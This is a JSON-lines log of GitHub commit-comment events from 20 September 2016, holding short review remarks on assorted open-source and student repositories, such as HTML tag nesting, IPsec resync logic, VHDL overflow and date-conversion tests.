{"id":"4591127330","type":"CommitCommentEvent","actor":{"login":"dhalperi"},"repo":{"name":"GoogleCloudPlatform/DataflowJavaSDK-examples"},"payload":{"comment":{"id":19100320,"position":86,"line":139,"path":"src/main/java/com/google/cloud/dataflow/examples/cookbook/DatastoreWordCount.java","commit_id":"d0f38ceff564c1a6fcc0e2b03e84cbe88cb8dd2e","created_at":"2016-09-20T17:20:06Z","updated_at":"2016-09-20T17:20:06Z","body":"Yes, I think so. @vikasrk this looks like an error in backporting? https://github.com/apache/incubator-beam/blob/master/examples/java/src/main/java/org/apache/beam/examples/cookbook/DatastoreWordCount.java#L138"}},"created_at":"2016-09-20T17:20:06Z"}
{"id":"4591129111","type":"CommitCommentEvent","actor":{"login":"LastAvenger"},"repo":{"name":"LastAvenger/srain"},"payload":{"comment":{"id":19100323,"position":null,"line":null,"path":null,"commit_id":"1ef7703cf94d232654e5b17fd6199dcd18d7f10b","created_at":"2016-09-20T17:20:23Z","updated_at":"2016-09-20T17:20:23Z","body":"Fix #37 "}},"created_at":"2016-09-20T17:20:23Z"}
{"id":"4591134355","type":"CommitCommentEvent","actor":{"login":"jhhaidar2014"},"repo":{"name":"jhhaidar2014/hello-world"},"payload":{"comment":{"id":19100338,"position":null,"line":null,"path":null,"commit_id":"edf09512e5fe1929cddf71e087088c1af194a908","created_at":"2016-09-20T17:21:16Z","updated_at":"2016-09-20T17:21:16Z","body":"test1"}},"created_at":"2016-09-20T17:21:16Z"}
{"id":"4591143683","type":"CommitCommentEvent","actor":{"login":"GoogleFrog"},"repo":{"name":"Spring-Chobby/Chobby"},"payload":{"comment":{"id":19100369,"position":null,"line":null,"path":null,"commit_id":"b996bbb097a8c8ffe2ebdf182a6aa0b7eb978394","created_at":"2016-09-20T17:22:45Z","updated_at":"2016-09-20T17:22:45Z","body":"Not sure, it didn't work. Perhaps it is a failure to set activeControl or to release the previous activeControl."}},"created_at":"2016-09-20T17:22:45Z"}
{"id":"4591145418","type":"CommitCommentEvent","actor":{"login":"oberon2007"},"repo":{"name":"calamares/calamares"},"payload":{"comment":{"id":19100375,"position":null,"line":null,"path":null,"commit_id":"d45a6bd856b0d741b796d9c53e6de83b620407fb","created_at":"2016-09-20T17:23:01Z","updated_at":"2016-09-20T17:23:01Z","body":"This is better but not perfect :wink: Not the buttons are correct, but the arrow.png s still need to be exchanged. The unpressed button will need the arrow down and pressed button arrow up."}},"created_at":"2016-09-20T17:23:01Z"}
{"id":"4591146276","type":"CommitCommentEvent","actor":{"login":"yuriyz"},"repo":{"name":"bedatadriven/activityinfo"},"payload":{"comment":{"id":19100377,"position":null,"line":null,"path":null,"commit_id":"53cbdc68368f0c7d58fc7ebbf9216f3405b3153f","created_at":"2016-09-20T17:23:10Z","updated_at":"2016-09-20T17:23:10Z","body":"@akbertram  please review to make sure it really what you meant"}},"created_at":"2016-09-20T17:23:10Z"}
{"id":"4591153032","type":"CommitCommentEvent","actor":{"login":"miklos1"},"repo":{"name":"firedrakeproject/tsfc"},"payload":{"comment":{"id":19100390,"position":7,"line":296,"path":"tsfc/kernel_interface.py","commit_id":"92560a99dc7ecefdf8d67ab2bb5a14ede43b143f","created_at":"2016-09-20T17:24:13Z","updated_at":"2016-09-20T17:24:13Z","body":"You need to be attentive with rebase/merge because you're undoing changes made on master. In particular, I think you can probably just drop this commit."}},"created_at":"2016-09-20T17:24:13Z"}
{"id":"4591153248","type":"CommitCommentEvent","actor":{"login":"monkeyworknet"},"repo":{"name":"overviewer/Minecraft-Overviewer"},"payload":{"comment":{"id":19100391,"position":null,"line":null,"path":null,"commit_id":"5862b34e9eccb6adac93684ee7647eae298e2621","created_at":"2016-09-20T17:24:14Z","updated_at":"2016-09-20T17:24:14Z","body":"Yup I was mistaken ... I had an older version that did not allow 1.10 blocks.  Sorry for confusion"}},"created_at":"2016-09-20T17:24:14Z"}
{"id":"4591157808","type":"CommitCommentEvent","actor":{"login":"shainer"},"repo":{"name":"calamares/calamares"},"payload":{"comment":{"id":19100404,"position":null,"line":null,"path":null,"commit_id":"d45a6bd856b0d741b796d9c53e6de83b620407fb","created_at":"2016-09-20T17:25:00Z","updated_at":"2016-09-20T17:25:00Z","body":"The package view is displayed below the group name. Therefore, to me it makes more sense to have the arrow pointing down when the package view is visible. Is there a different convention around this?"}},"created_at":"2016-09-20T17:25:00Z"}
{"id":"4591161109","type":"CommitCommentEvent","actor":{"login":"udkreddy"},"repo":{"name":"ravigamer95/Logic"},"payload":{"comment":{"id":19100412,"position":null,"line":null,"path":null,"commit_id":"dd04655e3d3f02c72155f5c9babf84c62b88047b","created_at":"2016-09-20T17:25:31Z","updated_at":"2016-09-20T17:25:31Z","body":"project circuit diagram please"}},"created_at":"2016-09-20T17:25:31Z"}
{"id":"4591162953","type":"CommitCommentEvent","actor":{"login":"Paebbels"},"repo":{"name":"VHDL/CoreLib"},"payload":{"comment":{"id":19100416,"position":6,"line":33,"path":"src/math.vhdl","commit_id":"10eb07b7dd2e56a8fe88c75df39d57a4cb76c71a","created_at":"2016-09-20T17:25:50Z","updated_at":"2016-09-20T17:25:50Z","body":"VHDL defines no overflow behavior. So each value depends on the simulator. Some wrap around others truncate and others use saturation arithmetic.\r\n\r\nI would like to avoid a solution in which the function is limited to 32 bit. Integers might grow in 2017."}},"created_at":"2016-09-20T17:25:50Z"}
{"id":"4591163166","type":"CommitCommentEvent","actor":{"login":"Zidane"},"repo":{"name":"SpongePowered/SpongeAPI"},"payload":{"comment":{"id":19100418,"position":null,"line":null,"path":null,"commit_id":"6fdd81f11ea26af8da23ab9e92adde5a69f4b4f6","created_at":"2016-09-20T17:25:52Z","updated_at":"2016-09-20T17:25:52Z","body":"@liach \r\n\r\nThat PR won't get any attention until it is fully implemented. If that is a problem, separate that PR into smaller ones and implement the portions as you go."}},"created_at":"2016-09-20T17:25:52Z"}
{"id":"4591164156","type":"CommitCommentEvent","actor":{"login":"christopherthielen"},"repo":{"name":"angular-ui/ui-router"},"payload":{"comment":{"id":19100421,"position":22,"line":49,"path":"src/ng2/directives/uiView.ts","commit_id":"7c54b751bf25f3f07250bc9769917d58b1d30934","created_at":"2016-09-20T17:26:01Z","updated_at":"2016-09-20T17:26:01Z","body":"`*Metadata` removed in ng 2.0.0"}},"created_at":"2016-09-20T17:26:01Z"}
{"id":"4591165788","type":"CommitCommentEvent","actor":{"login":"liach"},"repo":{"name":"SpongePowered/SpongeAPI"},"payload":{"comment":{"id":19100428,"position":null,"line":null,"path":null,"commit_id":"6fdd81f11ea26af8da23ab9e92adde5a69f4b4f6","created_at":"2016-09-20T17:26:17Z","updated_at":"2016-09-20T17:26:17Z","body":"Good."}},"created_at":"2016-09-20T17:26:17Z"}
{"id":"4591166662","type":"CommitCommentEvent","actor":{"login":"loriab"},"repo":{"name":"jturney/psi4"},"payload":{"comment":{"id":19100429,"position":24,"line":1794,"path":"psi4/share/psi4/python/driver.py","commit_id":"d3df4402c85c4e8b42f26511f5f41587bfef5081","created_at":"2016-09-20T17:26:26Z","updated_at":"2016-09-20T17:26:26Z","body":"semicolon?"}},"created_at":"2016-09-20T17:26:26Z"}
{"id":"4591175538","type":"CommitCommentEvent","actor":{"login":"greentechhobby"},"repo":{"name":"greentechhobby/SpaceVectorPWM_Arduino"},"payload":{"comment":{"id":19100460,"position":null,"line":null,"path":null,"commit_id":"07d87a726e3a1728b63a658973ea2e9cf539bf25","created_at":"2016-09-20T17:27:51Z","updated_at":"2016-09-20T17:27:51Z","body":"What is \"arduino deviso\"? \r\nYou can copy the implementation in the .h file into a .cpp file. Keep only the prototype in the .h file.  It should work. "}},"created_at":"2016-09-20T17:27:51Z"}
{"id":"4591181831","type":"CommitCommentEvent","actor":{"login":"m-sche"},"repo":{"name":"adrian17/Gallifreyan"},"payload":{"comment":{"id":19100474,"position":null,"line":null,"path":null,"commit_id":"f35bee518d76b2215714cd78593133c3cfec55d3","created_at":"2016-09-20T17:28:49Z","updated_at":"2016-09-20T17:28:49Z","body":"Confirmed, it doesn't generate overlapping lines anymore. Tested with words with a single S as well as in words with more S-type lettres, in which case the lines often connect a pair of lettres. I consider this a good solution and I like the simplicity."}},"created_at":"2016-09-20T17:28:49Z"}
{"id":"4591184496","type":"CommitCommentEvent","actor":{"login":"dbsm8"},"repo":{"name":"jpillora/cloud-torrent"},"payload":{"comment":{"id":19100484,"position":null,"line":null,"path":null,"commit_id":"0893b68161f1c578750bf654191afd73a3e50585","created_at":"2016-09-20T17:29:14Z","updated_at":"2016-09-20T17:29:14Z","body":"how about aws? how to?"}},"created_at":"2016-09-20T17:29:14Z"}
{"id":"4591184834","type":"CommitCommentEvent","actor":{"login":"ReneeJunior"},"repo":{"name":"joaoregis/nodejs"},"payload":{"comment":{"id":19100485,"position":16,"line":16,"path":".gitignore","commit_id":"dfe41d2d28ab3c7745b7d4d5f947bbd422209cf5","created_at":"2016-09-20T17:29:17Z","updated_at":"2016-09-20T17:29:17Z","body":"Joao, é só um teste"}},"created_at":"2016-09-20T17:29:17Z"}
{"id":"4591184945","type":"CommitCommentEvent","actor":{"login":"irvinemd55"},"repo":{"name":"irvinemd55/about_me"},"payload":{"comment":{"id":19100486,"position":null,"line":null,"path":null,"commit_id":"6dbe90ba1bcdd66b00538982beb41af2b01916ad","created_at":"2016-09-20T17:29:18Z","updated_at":"2016-09-20T17:29:18Z","body":"First test for leaving commentary."}},"created_at":"2016-09-20T17:29:18Z"}
{"id":"4591188948","type":"CommitCommentEvent","actor":{"login":"greentechhobby"},"repo":{"name":"greentechhobby/SpaceVectorPWM_Arduino"},"payload":{"comment":{"id":19100498,"position":null,"line":null,"path":null,"commit_id":"07d87a726e3a1728b63a658973ea2e9cf539bf25","created_at":"2016-09-20T17:29:57Z","updated_at":"2016-09-20T17:29:57Z","body":"Btw, you can do SVPWM in a few ways. This is a popular but old, inefficient example.  I'll post the most efficient one when I have time.  "}},"created_at":"2016-09-20T17:29:57Z"}
{"id":"4591189722","type":"CommitCommentEvent","actor":{"login":"asarfraaz"},"repo":{"name":"naveenbajaj123/python"},"payload":{"comment":{"id":19100501,"position":null,"line":null,"path":null,"commit_id":"56d20a05d3fc2787df01d828a9fa387059d20e3f","created_at":"2016-09-20T17:30:05Z","updated_at":"2016-09-20T17:30:05Z","body":"Code looks good. \r\n\r\n1> But I want the output to be something like below : \r\nFor input value 5, the table expected is : \r\n\r\n5 x 1 = 5\r\n5 x 2 = 10 ... and so on up to 5 x 10 = 50\r\n\r\n2> Also, when the user is prompted for a question, it is better to keep the cursor in the same line as the prompt.\r\n\r\n"}},"created_at":"2016-09-20T17:30:05Z"}
{"id":"4591191010","type":"CommitCommentEvent","actor":{"login":"terencode"},"repo":{"name":"emasab/shelltile"},"payload":{"comment":{"id":19100504,"position":null,"line":null,"path":null,"commit_id":"24db69343e559b4d5862de85f3a0663281e69f36","created_at":"2016-09-20T17:30:18Z","updated_at":"2016-09-20T17:30:18Z","body":"Thanks, was getting mad to see the orange resizing rectangles every time I move my mouse for no reason :stuck_out_tongue_closed_eyes: "}},"created_at":"2016-09-20T17:30:18Z"}
{"id":"4591195238","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"sdpernick/personal-website"},"payload":{"comment":{"id":19100513,"position":4,"line":3,"path":"index.html","commit_id":"91a4eeecdeeb5871e987ac2b0455db53cd1ed5b1","created_at":"2016-09-20T17:30:59Z","updated_at":"2016-09-20T17:30:59Z","body":"This opening `<body>` tag is in the wrong place. It should come after `</head>`."}},"created_at":"2016-09-20T17:30:59Z"}
{"id":"4591196487","type":"CommitCommentEvent","actor":{"login":"at-1"},"repo":{"name":"at-1/jekyll-at"},"payload":{"comment":{"id":19100518,"position":3,"line":5,"path":"_posts/2014-3-3-Hello-World.md","commit_id":"e29df684bd31f193092409c9af5ce71091e2094f","created_at":"2016-09-20T17:31:13Z","updated_at":"2016-09-20T17:31:13Z","body":"Hello World!"}},"created_at":"2016-09-20T17:31:13Z"}
{"id":"4591198597","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"sdpernick/personal-website"},"payload":{"comment":{"id":19100525,"position":18,"line":13,"path":"index.html","commit_id":"91a4eeecdeeb5871e987ac2b0455db53cd1ed5b1","created_at":"2016-09-20T17:31:37Z","updated_at":"2016-09-20T17:31:37Z","body":"Watch out for where you're opening and closing tags. The closing `</center>` tag should come before the closing `</h1>`."}},"created_at":"2016-09-20T17:31:37Z"}
{"id":"4591199499","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"sdpernick/personal-website"},"payload":{"comment":{"id":19100529,"position":21,"line":16,"path":"index.html","commit_id":"91a4eeecdeeb5871e987ac2b0455db53cd1ed5b1","created_at":"2016-09-20T17:31:47Z","updated_at":"2016-09-20T17:31:47Z","body":"Same comment as above here."}},"created_at":"2016-09-20T17:31:47Z"}
{"id":"4591201548","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"sdpernick/personal-website"},"payload":{"comment":{"id":19100533,"position":11,"line":11,"path":"portfolio.html","commit_id":"91a4eeecdeeb5871e987ac2b0455db53cd1ed5b1","created_at":"2016-09-20T17:32:08Z","updated_at":"2016-09-20T17:32:08Z","body":"Watch out for where you're opening and closing tags. The closing </center> tag should come before the closing </h1>."}},"created_at":"2016-09-20T17:32:08Z"}
{"id":"4591204397","type":"CommitCommentEvent","actor":{"login":"Martoon-00"},"repo":{"name":"serokell/time-warp"},"payload":{"comment":{"id":19100543,"position":22,"line":46,"path":"src/Control/TimeWarp/Logging.hs","commit_id":"ef678b91fd8fd511170a4590fe656a0b05eee7d4","created_at":"2016-09-20T17:32:36Z","updated_at":"2016-09-20T17:32:36Z","body":"It seems to be too long line. Don't we follow the rule of 80 chars anymore?"}},"created_at":"2016-09-20T17:32:36Z"}
{"id":"4591204629","type":"CommitCommentEvent","actor":{"login":"ruslangaripov"},"repo":{"name":"Serg-Norseman/CalendarConverter"},"payload":{"comment":{"id":19100545,"position":21,"line":220,"path":"CalendarConverterTests/UDNTests.cs","commit_id":"c27427ae830add3b739f7cfba1986a20f69e9a52","created_at":"2016-09-20T17:32:38Z","updated_at":"2016-09-20T17:32:38Z","body":"[The third try](http://aa.quae.nl/en/reken/juliaansedag.html#13_2_5) has been completed. :trollface:\r\n\r\nSorry, but it's an absolute :hankey:\r\n\r\n```\r\n------------------------- + ----------------------------------- +\r\n by `gregorian_to_jd5`: 0 |                        **** error o |\r\n by `gregorian_to_jd4`: 0 | -4713/11/24 (must be -4713/11/24) + |\r\n by `gregorian_to_jd3`: 0 |                        **** error o |\r\nby `gregorian_to_jd2`:  0 | -4713/11/24 (must be -4713/11/24) + |\r\n by `gregorian_to_jd`:  0 | -4713/11/23 (must be -4713/11/24) o |\r\n------------------------- + ----------------------------------- +\r\n by `gregorian_to_jd5`: 0 |                        **** error o |\r\n by `gregorian_to_jd4`: 0 | -4713/11/24 (must be -4713/11/24) + |\r\n by `gregorian_to_jd3`: 0 |                        **** error o |\r\nby `gregorian_to_jd2`:  0 | -4713/11/24 (must be -4713/11/24) + |\r\n by `gregorian_to_jd`:  0 | -4713/11/23 (must be -4713/11/24) o |\r\n. . .\r\n--------------------------------- + ----------------------------------- +\r\n   by `gregorian_to_jd5`: 1721450 |           1/1/25 (must be 1/1/25) + |\r\n   by `gregorian_to_jd4`: 1721450 |           1/1/25 (must be 1/1/25) + |\r\n   by `gregorian_to_jd3`: 1721450 |           1/1/25 (must be 1/1/25) + |\r\n  by `gregorian_to_jd2`:  1721450 |           1/1/25 (must be 1/1/25) + |\r\n   by `gregorian_to_jd`:  1721449 |           1/1/24 (must be 1/1/25) o |\r\n--------------------------------- + ----------------------------------- +\r\n         by `gregorian_to_jd5`: 0 |                        **** error o |\r\n   by `gregorian_to_jd4`: 2457173 |     2015/5/30 (must be 2015/5/30) + |\r\n   by `gregorian_to_jd3`: 2457173 |     2015/5/30 (must be 2015/5/30) + |\r\n  by `gregorian_to_jd2`:  2457173 |     2015/5/30 (must be 2015/5/30) + |\r\n   by `gregorian_to_jd`:  2457172 |     2015/5/29 (must be 2015/5/30) o |\r\n--------------------------------- + ----------------------------------- +\r\nand so on . . .\r\n```\r\n\r\n† `jd_to_gregorian5` is the new implementation.\r\n\r\nCommit with the changes is upcoming. You may see everything soon by yourself in 'UDNTest'.\r\n\r\n:finnadie:"}},"created_at":"2016-09-20T17:32:38Z"}
{"id":"4591206689","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"sdpernick/personal-website"},"payload":{"comment":{"id":19100554,"position":29,"line":29,"path":"portfolio.html","commit_id":"91a4eeecdeeb5871e987ac2b0455db53cd1ed5b1","created_at":"2016-09-20T17:32:59Z","updated_at":"2016-09-20T17:32:59Z","body":"The `<h4>` tags should be nested within the `<li>` tag. The `<li>` tags should always be the first nested item for lists."}},"created_at":"2016-09-20T17:32:59Z"}
{"id":"4591207632","type":"CommitCommentEvent","actor":{"login":"marcoarruda"},"repo":{"name":"EESC-LabRoM/labrom_sensors"},"payload":{"comment":{"id":19100556,"position":6,"line":58,"path":"ftdisonar/src/sonar_node.cpp","commit_id":"08413a322185e6610a82655faeb5416105cfb403","created_at":"2016-09-20T17:33:09Z","updated_at":"2016-09-20T17:33:09Z","body":"Nice!!"}},"created_at":"2016-09-20T17:33:09Z"}
{"id":"4591208026","type":"CommitCommentEvent","actor":{"login":"abinayagomathi"},"repo":{"name":"abinayagomathi/abinaya_works"},"payload":{"comment":{"id":19100559,"position":4,"line":2,"path":"README.md","commit_id":"d114ced05520931f0ff1b5371b730a37c0f8fea8","created_at":"2016-09-20T17:33:13Z","updated_at":"2016-09-20T17:33:13Z","body":"Fixed header branch demonstrates how to get a fixed header even though we scroll the page. "}},"created_at":"2016-09-20T17:33:13Z"}
{"id":"4591208925","type":"CommitCommentEvent","actor":{"login":"MitchBradley"},"repo":{"name":"quozl/cforth-1"},"payload":{"comment":{"id":19100561,"position":null,"line":null,"path":null,"commit_id":"9d3d888af88428ed460c5dd217f6a8dbf5c57a1e","created_at":"2016-09-20T17:33:23Z","updated_at":"2016-09-20T17:33:23Z","body":"The reason to use tcp-write-wait would be if you start to get watchdogs.  That probably will not be an issue for serving files from SPIFFS.  I had problems when doing long I2C transactions in order to get data for web pages."}},"created_at":"2016-09-20T17:33:23Z"}
{"id":"4591209836","type":"CommitCommentEvent","actor":{"login":"asarfraaz"},"repo":{"name":"naveenbajaj123/python"},"payload":{"comment":{"id":19100567,"position":null,"line":null,"path":null,"commit_id":"0a8167de005c786145fb0be53aab4ae4c64a2010","created_at":"2016-09-20T17:33:33Z","updated_at":"2016-09-20T17:33:33Z","body":"Looks good.\r\n\r\n1> I would like to see more consistency with the spaces in the output.\r\n2> Also, the last line seems to be skewed compared to the earlier lines in the output. You can try it as a challenge, to fix the last line, so that \"=\" symbols of all the lines are present in the same column."}},"created_at":"2016-09-20T17:33:33Z"}
{"id":"4591210759","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"sdpernick/personal-website"},"payload":{"comment":{"id":19100571,"position":24,"line":24,"path":"style.css","commit_id":"91a4eeecdeeb5871e987ac2b0455db53cd1ed5b1","created_at":"2016-09-20T17:33:43Z","updated_at":"2016-09-20T17:33:43Z","body":"When a font family is more than one word, wrap it in quotes, so \"Times New Roman\"."}},"created_at":"2016-09-20T17:33:43Z"}
{"id":"4591212912","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"sdpernick/personal-website"},"payload":{"comment":{"id":19100574,"position":99,"line":99,"path":"style.css","commit_id":"91a4eeecdeeb5871e987ac2b0455db53cd1ed5b1","created_at":"2016-09-20T17:34:04Z","updated_at":"2016-09-20T17:34:04Z","body":"Looks like you have an extra '#' here."}},"created_at":"2016-09-20T17:34:04Z"}
{"id":"4591217955","type":"CommitCommentEvent","actor":{"login":"LYoung07"},"repo":{"name":"LYoung07/githubTutorial"},"payload":{"comment":{"id":19100586,"position":null,"line":null,"path":null,"commit_id":"f7f9b32febe86ea3986c989e467696eef918da75","created_at":"2016-09-20T17:34:57Z","updated_at":"2016-09-20T17:34:57Z","body":"hello"}},"created_at":"2016-09-20T17:34:57Z"}
{"id":"4591218734","type":"CommitCommentEvent","actor":{"login":"pombredanne"},"repo":{"name":"django-extensions/django-extensions"},"payload":{"comment":{"id":19100591,"position":null,"line":null,"path":null,"commit_id":"d5d0ec1c69fb0e8b4b2e20723c304ef81f7a56ff","created_at":"2016-09-20T17:35:05Z","updated_at":"2016-09-20T17:35:05Z","body":"My 2 cents: this field SHOULD NOT be deprecated. the JSONField in Django works __only__ with PostgreSQL and no other database, hence this field still has a use."}},"created_at":"2016-09-20T17:35:05Z"}
{"id":"4591219044","type":"CommitCommentEvent","actor":{"login":"asarfraaz"},"repo":{"name":"naveenbajaj123/python"},"payload":{"comment":{"id":19100594,"position":null,"line":null,"path":null,"commit_id":"1e8c826bb76995a937f44d967e1d413718d439d1","created_at":"2016-09-20T17:35:08Z","updated_at":"2016-09-20T17:35:08Z","body":"Looks good, but does not meet all the required conditions of the question. The exclamation marks are missing in the output."}},"created_at":"2016-09-20T17:35:08Z"}
{"id":"4591219161","type":"CommitCommentEvent","actor":{"login":"dholth"},"repo":{"name":"apache/couchdb"},"payload":{"comment":{"id":19100595,"position":null,"line":null,"path":null,"commit_id":"948d2c02d791c2d6b719303101e288cb98fa68ad","created_at":"2016-09-20T17:35:09Z","updated_at":"2016-09-20T17:35:09Z","body":"This still calls the option proxy_authentification_handler"}},"created_at":"2016-09-20T17:35:09Z"}
{"id":"4591228350","type":"CommitCommentEvent","actor":{"login":"davidpintos"},"repo":{"name":"erktime/craft-localesync"},"payload":{"comment":{"id":19100625,"position":null,"line":null,"path":null,"commit_id":"295886e9579f3784ef1a9a205ffe2d09db63dbc3","created_at":"2016-09-20T17:36:43Z","updated_at":"2016-09-20T17:36:43Z","body":"👍 "}},"created_at":"2016-09-20T17:36:43Z"}
{"id":"4591228839","type":"CommitCommentEvent","actor":{"login":"flovilmart"},"repo":{"name":"hramos/docs"},"payload":{"comment":{"id":19100628,"position":17,"line":30,"path":"_includes/parse-server/getting-started.md","commit_id":"f1d57446fb435bcacddc161a8d125df1a06ea44c","created_at":"2016-09-20T17:36:49Z","updated_at":"2016-09-20T17:36:49Z","body":"It auto generates them if you want nice new ones too :)"}},"created_at":"2016-09-20T17:36:49Z"}
{"id":"4591228932","type":"CommitCommentEvent","actor":{"login":"rafaelcp"},"repo":{"name":"openai/gym"},"payload":{"comment":{"id":19100629,"position":null,"line":null,"path":null,"commit_id":"5ba5cb7e2dd7fb06412b0ba26fdba14127e87bbf","created_at":"2016-09-20T17:36:49Z","updated_at":"2016-09-20T17:36:49Z","body":"This removes Acrobot-v0! How can I restore it?"}},"created_at":"2016-09-20T17:36:49Z"}
{"id":"4591243028","type":"CommitCommentEvent","actor":{"login":"lazd"},"repo":{"name":"karma-runner/karma-html2js-preprocessor"},"payload":{"comment":{"id":19100663,"position":null,"line":null,"path":null,"commit_id":"c89b01cdaab19243c79c6196990ed5d33ac058e2","created_at":"2016-09-20T17:39:14Z","updated_at":"2016-09-20T17:39:14Z","body":"It doesn't look like this was published to npm: https://www.npmjs.com/package/karma-html2js-preprocessor"}},"created_at":"2016-09-20T17:39:14Z"}
{"id":"4591245510","type":"CommitCommentEvent","actor":{"login":"vanfstd"},"repo":{"name":"snabbco/snabb"},"payload":{"comment":{"id":19100672,"position":28,"line":56,"path":"src/apps/ipsec/esp.lua","commit_id":"fa01474c430dbf938feda5d5df7775b377b14fe2","created_at":"2016-09-20T17:39:40Z","updated_at":"2016-09-20T17:39:40Z","body":"If you don't `decap_fail = 0` here, every subsequent packet will be subject to resync.  RFC4303 doesn't mention this directly but I think it's a reasonable thing to do and in line with their suggestion to make resync be as cheap as possible.\r\nOf course, the variable name is a bit of a lie, then."}},"created_at":"2016-09-20T17:39:40Z"}
{"id":"4591247672","type":"CommitCommentEvent","actor":{"login":"otg-chris"},"repo":{"name":"magento/magento2"},"payload":{"comment":{"id":19100680,"position":null,"line":null,"path":null,"commit_id":"488bfdfff7c51824d9a4a2c1061019b3b35b2d72","created_at":"2016-09-20T17:40:03Z","updated_at":"2016-09-20T17:40:03Z","body":"Is this the actual fix? The change here isn't anything besides putting it on more lines. I did see the addition of \"[1]\" over the Mage2.1 code, but trying that didn't fix the problem on my install. Also this file seems like it would be for testing not the actual order form handling."}},"created_at":"2016-09-20T17:40:03Z"}
{"id":"4591248260","type":"CommitCommentEvent","actor":{"login":"fmrmx"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19100681,"position":null,"line":null,"path":null,"commit_id":"f07fe63e50062941dd99ce719f27f6d09ecfbd7d","created_at":"2016-09-20T17:40:10Z","updated_at":"2016-09-20T17:40:10Z","body":"Before this commit, wintergrasp was running perfect for me with GridUnload set to 0, so i decided to revert this commit"}},"created_at":"2016-09-20T17:40:10Z"}
{"id":"4591250517","type":"CommitCommentEvent","actor":{"login":"kyleyu-work"},"repo":{"name":"kyleyu-work/soccer-coordinator"},"payload":{"comment":{"id":19100693,"position":24,"line":138,"path":"SoccerLeagueCoordinator.playground/Contents.swift","commit_id":"29a65229e5bd289e6e3dc43fae6e7f9c71d57960","created_at":"2016-09-20T17:40:33Z","updated_at":"2016-09-20T17:40:33Z","body":"Since playerPerTeam may be odd, i expect it to be truncated when divided by 2. k * playerPerTeam will not truncate playerPerTeam is k is even number."}},"created_at":"2016-09-20T17:40:33Z"}
{"id":"4591251201","type":"CommitCommentEvent","actor":{"login":"vanfstd"},"repo":{"name":"snabbco/snabb"},"payload":{"comment":{"id":19100696,"position":4,"line":101,"path":"src/lib/ipsec/aes_128_gcm.lua","commit_id":"fa01474c430dbf938feda5d5df7775b377b14fe2","created_at":"2016-09-20T17:40:39Z","updated_at":"2016-09-20T17:40:39Z","body":"I have to admit I like that this API change would be undone, I wasn't very fond of it."}},"created_at":"2016-09-20T17:40:39Z"}
{"id":"4591252778","type":"CommitCommentEvent","actor":{"login":"cravay"},"repo":{"name":"motivationsbanner/client"},"payload":{"comment":{"id":19100701,"position":null,"line":null,"path":null,"commit_id":"5a34f35ec7a220dd53886a2e2f04d5e2be167cea","created_at":"2016-09-20T17:40:57Z","updated_at":"2016-09-20T17:40:57Z","body":"kek"}},"created_at":"2016-09-20T17:40:57Z"}
{"id":"4591253168","type":"CommitCommentEvent","actor":{"login":"auger-frederik"},"repo":{"name":"auger-frederik/assembleur"},"payload":{"comment":{"id":19100702,"position":null,"line":null,"path":null,"commit_id":"4a2159e6df1dc951f8a5bb2f3b92caf400025366","created_at":"2016-09-20T17:41:01Z","updated_at":"2016-09-20T17:41:01Z","body":"Test"}},"created_at":"2016-09-20T17:41:01Z"}
{"id":"4591257231","type":"CommitCommentEvent","actor":{"login":"multinerd"},"repo":{"name":"unboxme/LRSmartTextField"},"payload":{"comment":{"id":19100715,"position":5,"line":65,"path":"LRTextField/LRTextField.m","commit_id":"a304e02aeb06524ae73daac9b98b745f269a68be","created_at":"2016-09-20T17:41:41Z","updated_at":"2016-09-20T17:41:41Z","body":"did this really fix it for you? i had problems with the `_floatingLabelHeight = self.frame.size.height / 2;` line.\r\n`self.frame.size.height / 2` was returning `500` which was way too high for a label height.\r\nMy fix was `_floatingLabelHeight = 14;`\r\n"}},"created_at":"2016-09-20T17:41:41Z"}
{"id":"4591259530","type":"CommitCommentEvent","actor":{"login":"vanfstd"},"repo":{"name":"snabbco/snabb"},"payload":{"comment":{"id":19100720,"position":44,"line":164,"path":"src/lib/ipsec/esp.lua","commit_id":"fa01474c430dbf938feda5d5df7775b377b14fe2","created_at":"2016-09-20T17:42:05Z","updated_at":"2016-09-20T17:42:05Z","body":"It could(?) be equally clean to make a separate function of this, rather than yanking it out and deferring to the app.  Have to think about it"}},"created_at":"2016-09-20T17:42:05Z"}
{"id":"4591261089","type":"CommitCommentEvent","actor":{"login":"B--B"},"repo":{"name":"AOSP-JF-MM/platform_device_samsung_jflte"},"payload":{"comment":{"id":19100725,"position":null,"line":null,"path":null,"commit_id":"0cfb340e06f709eea2483a561c8a12add223a160","created_at":"2016-09-20T17:42:20Z","updated_at":"2016-09-20T17:42:20Z","body":"Loki is untested too, as i don't have a locked bootloader device"}},"created_at":"2016-09-20T17:42:20Z"}
{"id":"4591267054","type":"CommitCommentEvent","actor":{"login":"bumbadadabum"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":19100743,"position":null,"line":null,"path":null,"commit_id":"6b4eaf94224c8c1bbf3019a3589e4b495c6fe8cb","created_at":"2016-09-20T17:43:21Z","updated_at":"2016-09-20T17:43:21Z","body":"Roomhelp doesn't work the others do and are just as annoying\n"}},"created_at":"2016-09-20T17:43:21Z"}
{"id":"4591272140","type":"CommitCommentEvent","actor":{"login":"FernBch"},"repo":{"name":"AOSP-JF-MM/platform_device_samsung_jflte"},"payload":{"comment":{"id":19100760,"position":null,"line":null,"path":null,"commit_id":"0cfb340e06f709eea2483a561c8a12add223a160","created_at":"2016-09-20T17:44:13Z","updated_at":"2016-09-20T17:44:13Z","body":"I do (SCH-I545) and can test when you are ready."}},"created_at":"2016-09-20T17:44:13Z"}
